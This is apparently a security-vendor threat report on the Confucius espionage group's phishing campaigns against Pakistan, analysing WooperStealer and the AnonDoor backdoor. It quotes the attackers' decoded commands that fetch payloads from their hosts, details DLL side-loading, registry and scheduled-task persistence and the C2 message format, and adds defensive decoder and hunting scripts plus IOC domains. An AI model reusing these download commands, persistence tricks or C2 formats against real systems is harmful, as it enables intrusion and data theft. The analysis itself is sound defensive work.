Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attacks
Severity Level: High
The Confucius group is a long-running cyber-espionage actor operating primarily across South Asia. First identified in 2013, the group is believed to have links to state-sponsored operations in the region. Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries—especially in Pakistan—using spear-phishing and malicious documents as initial access vectors. Recent campaigns have highlighted a sharp evolution in tactics, shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor. This progression underscores Confucius’ adaptability and the growing sophistication of state-aligned malware campaigns in the region.
Over the past several months, FortiGuard Labs has observed Confucius evolving its tradecraft, leveraging weaponized Office documents, malicious LNK files, and multiple malware families, including custom Python RATs and advanced stealers. The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness. In this blog, we will provide a chronological walkthrough of Confucius’ recent activity.
Figure 1: Confucius’ activities
This phishing email campaign targeted users in Pakistan. The message relied on authority spoofing, minimal context, and an action-oriented request to entice the recipient into opening the attachment and kick off the infection chain.
Once Document.ppsx was opened, it displayed a “Corrupted Page” message. In the background, an OLE object embedded via slide1.xml.rels fetched and triggered a script from the remote host greenxeonsr[.]info.
Despite its .doc extension, mango44NX.doc is a VBScript: a compact dropper with persistence and execution-staging logic. Its first part downloads a remote payload from hxxps://greenxeonsr[.]info/Jsdfwejhrg.rko via MSXML2.XMLHTTP, writes the raw response bytes to %LocalAppData%\Mapistub.dll through an ADODB.Stream, and then closes the stream.
It then copies C:\Windows\System32\fixmapi.exe to %AppData% as Swom.exe and writes a registry string value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load that points to it. Windows runs whatever this legacy Load value names at user logon, so the entry serves as persistence. Finally, it launches Swom.exe through a reconstructed Shell.Application COM object so that the renamed fixmapi.exe side-loads the malicious Mapistub.dll.
Figure 5: Registry setting
The malicious DLL Mapistub.dll prepared two remote addresses (cornfieldblue[.]info and hauntedfishtree[.]info) for the next stage of stealer activity.
Figure 6: MSIL downloader
After downloading the data, it loaded the received file and invoked the hard-coded method Yretisdkjhsfkjfh.
Figure 7: Hard-coded method
Analysis revealed that the final-stage payload was WooperStealer, identifiable by the stringToEscape variable Class1.Wooper. This stealer was configured to collect a wide range of file types with specific extensions (each listed in both cases, which suggests a case-sensitive comparison): .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .doc, .DOC, .xls, .XLS, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG, .eml, .EML, .pst, .PST, .ZIP, .zip, .RAR, .rar. It enumerates the compromised system with Directory.GetLogicalDrives and uploads stolen data to the remote URL hxxp://marshmellowflowerscar[.]info.
By early 2025, the Confucius group had shifted to using malicious LNK files in their campaigns. During our investigation, we obtained a sample associated with the machine ID desktop-1tjntib. It prepared a legitimate executable, BlueAle.exe, copied from C:\Windows\System32\fixmapi.exe, and downloaded a malicious DLL and a decoy PDF from the remote server petricgreen[.]info.
The decoded $x command is:
curl -o ($pa + '\mapistub.dll') “hxxps://petricgreen[.]info/RPXFD38WAPR7.rko”;$j=$env:TMP + '\file.pdf'; curl -o $j “hxxps://petricgreen[.]info/BWN9ZAP.rko”;
The malicious DLL, mapistub.dll, copied targeted files into C:\Windows\Tasks and established persistence by adding registry entries.
Figure 10: Registry setting
The DLL embedded two Base64-encoded strings, representing remote hosts for the final payload. Once the additional data was downloaded, the DLL invoked it using the same hard-coded method observed in earlier activity.
Figure 11: MSIL downloader
The final payload was again identified as WooperStealer, this time with minor modifications to its target list of file extensions: .zip, .rar, .eml, .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .DOC, .doc, .XLS, .xls, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG.
Figure 12: Targeted directory list
Figure 13 shows the familiar stringToEscape variable Class1.Wooper, solidifying attribution to WooperStealer.
WooperStealer uploads stolen files with POST requests carrying three parameters: value1 holds the victim’s system identifiers (<SerialNumber>_<ComputerName>_<UserName>), value2 the file path, and value3 the file hash. The hash lets the server reject files it has already received, so the same file is not uploaded multiple times.
Figure 14: Uploaded stolen file
Figure 15: Transmitting the hash of the stolen file
Based on the telemetry gathered by FortiGuard Labs, this attack targets users in Pakistan.
In August, we observed another malicious LNK file, NLC.pdf.lnk, that leveraged a similar execution technique but introduced new payloads. The decoded command in the $x variable revealed the following activity:
curl -o ($pa + '\python313.dll') “bloomwpp.info/KM9XFY.kut”;curl -o $c “bloomwpp.info/WTBXX46.kut”;$j=$env:TMP + '\file.pdf'; curl -o $j “bloomwpp.info/JRC89.kut”;
The LNK carries a long numeric array that is piped through %{[char]($_-217)} to reconstruct a script, which it then executes with IEX. The script fetches data from bloomwpp.info and writes it to %LocalAppData% under the filenames python313.dll and BlueAle.exe, along with a temporary PDF named file.pdf. The PDF is opened immediately to distract the user while BlueAle.exe side-loads the malicious python313.dll.
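As an added example (not code from the original report or from the LNK itself), the following Python decoder recovers the plaintext hidden by this numeric-array obfuscation. It reads the offset and its sign from the [char]($_-N) expression rather than assuming 217, so it also handles variants of the trick. The script in SAMPLE is constructed for illustration and decodes to a harmless placeholder command, not to the real LNK payload.

```python
import re

# Matches "( n1, n2, ... ) | %{[char]($_-N)}" (or ForEach-Object instead of %),
# capturing the number list, the operator and the offset.
ARRAY_RE = re.compile(
    r"\(\s*((?:\d+\s*,\s*)+\d+)\s*\)\s*\|\s*(?:%|ForEach-Object)\s*\{\s*\[char\]"
    r"\s*\(\s*\$_\s*([+-])\s*(\d+)\s*\)\s*\}",
    re.IGNORECASE,
)

def decode_char_arrays(script):
    """Return the decoded string for every numeric array in `script` that is
    piped through %{[char]($_ +/- N)}. Values that do not map to a code point
    are rendered as '?' so a partially corrupted array still yields output."""
    decoded = []
    for match in ARRAY_RE.finditer(script):
        numbers = [int(n) for n in re.split(r"\s*,\s*", match.group(1).strip())]
        delta = int(match.group(3))
        if match.group(2) == "-":
            delta = -delta
        chars = []
        for n in numbers:
            code = n + delta
            chars.append(chr(code) if 0 <= code <= 0x10FFFF else "?")
        decoded.append("".join(chars))
    return decoded

# Constructed sample in the shape described above. The numbers are each
# character of the placeholder command "Write-Host test" plus 217; they are
# not taken from the real LNK file.
SAMPLE = (
    "$x = (304,331,322,333,318,262,289,328,332,333,249,333,318,332,333)"
    " | %{[char]($_-217)}; IEX $x"
)

if __name__ == "__main__":
    for text in decode_char_arrays(SAMPLE):
        print(text)  # Write-Host test
```

Feed the function the raw argument string extracted from the LNK (for instance with a parser such as LECmd or the lnk module) and grep the output for the URLs and file paths; the decoded text, not the array, is what belongs in the IOC list.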
Unlike previous campaigns that deployed WooperStealer, python313.dll sets up an execution environment for a new Python-based backdoor. It first creates a temporary PowerShell script at %TEMP%\_CL_cb7565c393993c050319426106747613in.ps1, downloaded from hxxps://bloomwpp[.]info/hjopjhfgda.ps1, which installs Scoop and configures the environment variables required to ensure Python code can execute without errors.
Figure 18: MSIL downloader
Figure 19: Preparing the python execution path
It then constructs the remote URL hxxps://bloomwpp[.]info/hjdfyebvghu[.]pyc, downloads the raw bytes with a GetByteArrayAsync call that it waits on synchronously, and writes them to a file named winresume.pyc under the current user’s %LOCALAPPDATA% directory. After writing the file, it marks it hidden with FileAttributes.Hidden.
It then builds the path string %LOCALAPPDATA%\winresume.pyc and creates a scheduled task named NetPolicyUpdate that runs %USERPROFILE%\scoop\apps\python\current\pythonw.exe (the interpreter installed through Scoop by the earlier PowerShell script) with the .pyc as its argument every 5 minutes. This task replaces the registry-based persistence seen in the earlier campaigns and is a quieter launcher, since pythonw.exe opens no console window.
Figure 21: Persistence setting preparation
Figure 22: Scheduled task
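The two persistence mechanisms described in this report, the Windows\load registry value from the VBScript dropper and the NetPolicyUpdate scheduled task from the LNK chain, can both be hunted from the output of built-in tools. The following Python is an added example written for this page, not code from the report; it parses constructed samples of `schtasks /query /fo CSV /v` and `reg query` output (reduced to the columns that matter, with a made-up user name and host) and flags the launcher pattern. Run it against real exports collected from a host; only the sample text is embedded here so that it works offline.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /fo CSV /v` output, reduced to the
# columns this check uses (the real output has many more). The NetPolicyUpdate
# row mirrors the task described above; the first row is benign filler.
SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run"
"HOST1","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
"HOST1","\NetPolicyUpdate","Ready","HOST1\user","C:\Users\user\scoop\apps\python\current\pythonw.exe C:\Users\user\AppData\Local\winresume.pyc"
'''

# Constructed sample of `reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"`.
REG_QUERY = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
    Load    REG_SZ    C:\Users\user\AppData\Roaming\Swom.exe
    DeviceNotSelectedTimeout    REG_SZ    15
'''

PYTHONW_PYC = re.compile(r"pythonw\.exe\b.*\.pyc\b", re.IGNORECASE)
SCOOP_PYTHON = re.compile(r"\\scoop\\apps\\python\\", re.IGNORECASE)
LOAD_VALUE = re.compile(r"^\s*Load\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$",
                        re.IGNORECASE | re.MULTILINE)

def find_suspicious_tasks(csv_text):
    """Return [(task_name, action, reasons)] for tasks whose action matches the
    AnonDoor launcher pattern: pythonw.exe fed a .pyc, or any interpreter living
    in a per-user Scoop install."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run", "")
        reasons = []
        if PYTHONW_PYC.search(action):
            reasons.append("pythonw.exe launching a .pyc")
        if SCOOP_PYTHON.search(action):
            reasons.append("interpreter under a user-writable Scoop install")
        if reasons:
            findings.append((row["TaskName"], action, reasons))
    return findings

def load_value(reg_text):
    """Return the Load value from `reg query` output, or None if it is not set.
    Anything named here runs at logon and is rarely legitimate on a modern host."""
    match = LOAD_VALUE.search(reg_text)
    return match.group(1) if match else None

if __name__ == "__main__":
    for name, action, reasons in find_suspicious_tasks(SCHTASKS_CSV):
        print(f"{name}: {action} [{'; '.join(reasons)}]")
    print("Load =", load_value(REG_QUERY))
```

The task check deliberately keys on the interpreter location and the .pyc argument rather than on the name NetPolicyUpdate, which the actor can change at no cost.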
The PYC file winresume.pyc serves as a backdoor that collects system information, contacts its C2 server, and receives commands for further action.
Figure 23: PYC version of AnonDoor
The following analysis is based on the disassembly code from the PYC file.
Figure 24: Disassembly code of the PYC file
By dropping a timestamp into %TEMP%\wctDD1A.tmp, AnonDoor ensures its heavier tasks run at most once every 6 minutes on a host; with the scheduled task firing every 5 minutes, roughly every other run performs the full routine. That reduces noise, avoids redundant exfiltration, and gives the operator more controlled timing.
Figure 25: TEMP file to track execution time
It runs a compact fingerprinting routine that quietly profiles the host and its network before performing any noisy actions. It derives the local egress IP and grabs the hostname and logged-in user. It then fingerprints the OS with platform.platform(). For external context, it queries several public IP echo services in sequence (api.ipify.org, ipinfo.io/ip, icanhazip.com, and ifconfig.me/ip). Once it has a public IP, it geo-locates the country via ip-api.com and ipwhois.app. To uniquely tag hardware, it executes a hidden wmic csproduct get uuid command. Requests to these lookup services originating from pythonw.exe, and a pythonw.exe process spawning wmic.exe, are useful hunting signals in their own right.
Figure 26: Get system information
AnonDoor consolidates the collected system information into the parameter uhhg using $!!$ as a delimiter between fields. The resulting data is transmitted to the C2 server, where access and retrieval appear to be restricted to specific geographic targets such as Pakistan. The overall packet structure closely mirrors that of the earlier MSIL-based AnonDoor backdoor, underscoring Confucius’ recent transition toward deploying a Python-based variant of AnonDoor.
Figure 27: C2 server information
It uses the Windows API GetDiskFreeSpaceExW to quietly inventory local storage: it walks drive letters A:\ through Z:\, checks which paths exist, and calls GetDiskFreeSpaceExW for each live volume. It converts bytes to gibibytes by integer division by 1,073,741,824 (labelling the result GB) and emits compact entries such as C:476GB/ Free-120GB, then joins all volume entries and sends them to the C2 server in the parameter fhgfh.
Figure 29: Get system's volume information
AnonDoor then contacts its C2 server with the parameter cuud to request further tasks. If the server replies with anything other than the sentinel string Somethingworng1, the backdoor immediately POSTs an acknowledgement of the form sout=<ID>@$$@<raw_task_data>. It then splits the raw task data on #$$ and dispatches on the task name. Supported commands include CmdExecution, Screenshoot, fileListing, DownloadFile, Directory_listing, FolderDownload, basicinfo, and PasswordDumper. For some tasks, AnonDoor downloads another Python file from a URL carried inside <raw_task_data> and executes it.
Figure 30: Constructing a packet for a C2 command
Figure 31: Handling the C2 command
Take the Screenshoot command, for example. AnonDoor receives the module URL hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py, which is used to capture the victim’s screen. It then builds PNG data of the screenshot into the format of <uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>. It then encodes the entire data with Base64 and sends it back to the C2 server with the parameter SCtat.
Figure 32: Python module for Screenshoot
Figure 33: Python module for fileListing
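The task and result layouts described above (the #$$-separated task, the sout acknowledgement, and the !$$$!-separated Screenshoot result) lend themselves to a small decoder for triaging captured traffic. The following Python is an added example, not code from the report or from AnonDoor. It assumes that the task name is the first #$$ field (the report only states that the data is split on #$$ and dispatched on the name), and its sample task, UUID, task ID and PNG body are constructed; only the module URL and the delimiters are taken from the text.

```python
import base64

TASK_SEP = "#$$"        # separates fields of a task received via the cuud request
RESULT_SEP = "!$$$!"    # separates fields of the Screenshoot result sent as SCtat
MODULE_SEP = "###"      # splits <command>###<module_url> inside the result
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
NO_TASK = "Somethingworng1"
KNOWN_TASKS = {"CmdExecution", "Screenshoot", "fileListing", "DownloadFile",
               "Directory_listing", "FolderDownload", "basicinfo", "PasswordDumper"}

def parse_task(raw):
    """Split a raw cuud reply into (task_name, args). Returns None for the
    no-task sentinel. Treating field 0 as the task name is an assumption."""
    if raw == NO_TASK:
        return None
    fields = raw.split(TASK_SEP)
    name = fields[0]
    if name not in KNOWN_TASKS:
        raise ValueError(f"unknown task {name!r}")
    return name, fields[1:]

def build_sout(task_id, raw):
    """The immediate acknowledgement the backdoor POSTs: sout=<ID>@$$@<raw_task_data>."""
    return f"sout={task_id}@$$@{raw}"

def decode_sctat(blob):
    """Decode a captured SCtat value back into its fields, returning a dict that
    includes the PNG bytes. Raises ValueError if the layout or PNG signature
    does not match, so a mangled or non-Screenshoot capture fails loudly."""
    outer = base64.b64decode(blob).decode("utf-8")
    parts = outer.split(RESULT_SEP)
    if len(parts) != 5 or parts[1] != "Screenshoot":
        raise ValueError("not a Screenshoot result")
    uuid, _, cmd_and_url, task_id, png_b64 = parts
    command, _, module_url = cmd_and_url.partition(MODULE_SEP)
    png = base64.b64decode(png_b64)
    if not png.startswith(PNG_MAGIC):
        raise ValueError("payload is not a PNG")
    return {"uuid": uuid, "command": command, "module_url": module_url,
            "id": task_id, "png": png}

def build_sctat(uuid, command, module_url, task_id, png):
    """Inverse of decode_sctat; used here only to construct a sample capture."""
    inner = RESULT_SEP.join([uuid, "Screenshoot", command + MODULE_SEP + module_url,
                             task_id, base64.b64encode(png).decode()])
    return base64.b64encode(inner.encode()).decode()

# Constructed sample: a task as the C2 would send it and the matching SCtat
# result. The UUID, ID and the bytes after the PNG signature are made up.
MODULE_URL = "hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py"
SAMPLE_TASK = TASK_SEP.join(["Screenshoot", MODULE_URL, "42"])
FAKE_PNG = PNG_MAGIC + b"IMAGE"
SAMPLE_SCTAT = build_sctat("0000-UUID", "Screenshoot", MODULE_URL, "42", FAKE_PNG)

if __name__ == "__main__":
    print(parse_task(SAMPLE_TASK))
    print(build_sout("42", SAMPLE_TASK))
    result = decode_sctat(SAMPLE_SCTAT)
    print(result["module_url"], len(result["png"]), "bytes")
```

Applied to a proxy or packet capture, decode_sctat turns each SCtat POST back into the module URL that was fetched (a candidate IOC) and the screenshot that left the host, which is what an incident responder needs to scope what the actor saw.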
For PasswordDumper, which we observed in September, the helper URLs are hard-coded in the PYC file rather than supplied in the task. AnonDoor downloads both helpers from bloomwpp[.]info and caches their source in memory, then chooses which one to run based on the task’s target: Fohjdfj783mq9XX.py for Firefox and Fodkh3897mgfdjiuED.py for Edge.
Figure 34: Dump of Firefox data
Figure 35: Dump of Edge data
Our analysis reveals how the Confucius group has continually evolved its techniques, adopting diverse file types as initial access vectors and chaining OLE objects, malicious scripts, LNK files, PowerShell loaders, MSIL downloaders, and heavily obfuscated payloads to evade detection. This campaign underscores the group’s technical agility, cycling between malware families such as WooperStealer, the MSIL-based AnonDoor, and its Python-based variant.
The layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility. As threat actors persistently refine their methods to bypass defenses, maintaining vigilance against varied attack techniques is critical. FortiGuard Labs will continue to closely monitor these evolving operations, providing timely and comprehensive protection to our users.
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
LNK/Agent.CFI!tr
LNK/Agent.CFU!tr
MSOffice/Agent.BKJ!tr
VBS/Agent.NSL!tr
MSIL/Agent.RGG!tr.dldr
MSIL/Agent.FFD!tr
MSIL/Agent.5CE1!tr
Python/Agent.ANB!tr
FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.
FortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing protection provided by FortiSandbox, embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions, offers advanced protection against both known and unknown phishing attempts.
The FortiGuard CDR (Content Disarm and Reconstruction) service, which runs on both FortiGate and FortiMail, can disarm the malicious macros in the document.
We also suggest that organizations go through Fortinet’s free NSE training module: FCF Fortinet Certified Fundamentals. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.
FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.
If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.
marshmellowflowerscar.info
greenxeonsr.info
cornfieldblue.info
hauntedfishtree.info
petricgreen.info
bloomwpp.info
dropmicis.info
martkartout.info